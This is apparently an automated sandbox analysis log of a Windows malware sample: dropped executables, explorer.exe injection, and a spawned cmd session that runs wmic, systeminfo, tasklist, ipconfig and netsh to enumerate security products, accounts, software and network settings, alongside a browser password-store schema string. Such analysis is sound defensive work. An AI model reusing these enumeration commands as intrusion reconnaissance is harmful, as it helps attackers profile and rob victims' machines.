Source: C:\Users\user\AppData\Roaming\dghchav Command line argument: GxBn 38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav Command line argument: O$b~ 38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav Command line argument: ":,x 38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav Command line argument: ls/K 38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav Command line argument: K`: 38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav Command line argument: <'w 38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav Command line argument: J}s` 38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav Command line argument: 7-T= 38_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav Command line argument: GxBn 39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav Command line argument: O$b~ 39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav Command line argument: ":,x 39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav Command line argument: ls/K 39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav Command line argument: K`: 39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav Command line argument: <'w 39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav Command line argument: J}s` 39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav Command line argument: 7-T= 39_2_00401840
Source: 9VgIkx4su0.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;332&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;420&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;496&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;504&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;564&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;632&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;640&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;780&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;788&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;872&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;924&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;992&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;444&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;732&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;280&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1032&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1056&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1068&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1148&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1188&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1232&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1324&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1384&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1416&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1424&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1460&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1584&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1612&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1660&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1688&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1700&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1820&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1836&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1936&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1944&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1952&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2024&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2096&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2152&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2188&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2204&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2240&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2392&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2400&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2440&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2484&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2492&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2528&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2588&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2596&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2628&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2768&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2868&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2932&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3260&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3512&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3696&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3756&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3984&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2456&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4132&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4800&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4800&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4572&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5152&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5932&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6708&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6792&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6836&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6960&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3584&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5640&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5608&quot;::GetOwner
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: A7E9.tmp.10.dr, AF9D.tmp.10.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 9VgIkx4su0.exe ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\9VgIkx4su0.exe "C:\Users\user\Desktop\9VgIkx4su0.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\eihchav C:\Users\user\AppData\Roaming\eihchav
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3E40.exe C:\Users\user\AppData\Local\Temp\3E40.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\dghchav C:\Users\user\AppData\Roaming\dghchav
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\FDDB.exe C:\Users\user\AppData\Local\Temp\FDDB.exe
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
Source: unknown Process created: C:\Users\user\AppData\Roaming\dghchav C:\Users\user\AppData\Roaming\dghchav
Source: unknown Process created: C:\Users\user\AppData\Roaming\eihchav C:\Users\user\AppData\Roaming\eihchav
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3E40.exe C:\Users\user\AppData\Local\Temp\3E40.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\FDDB.exe C:\Users\user\AppData\Local\Temp\FDDB.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Process created: C:\Windows\System32\cmd.exe cmd Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: winscard.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: devobj.dll Jump to behavior
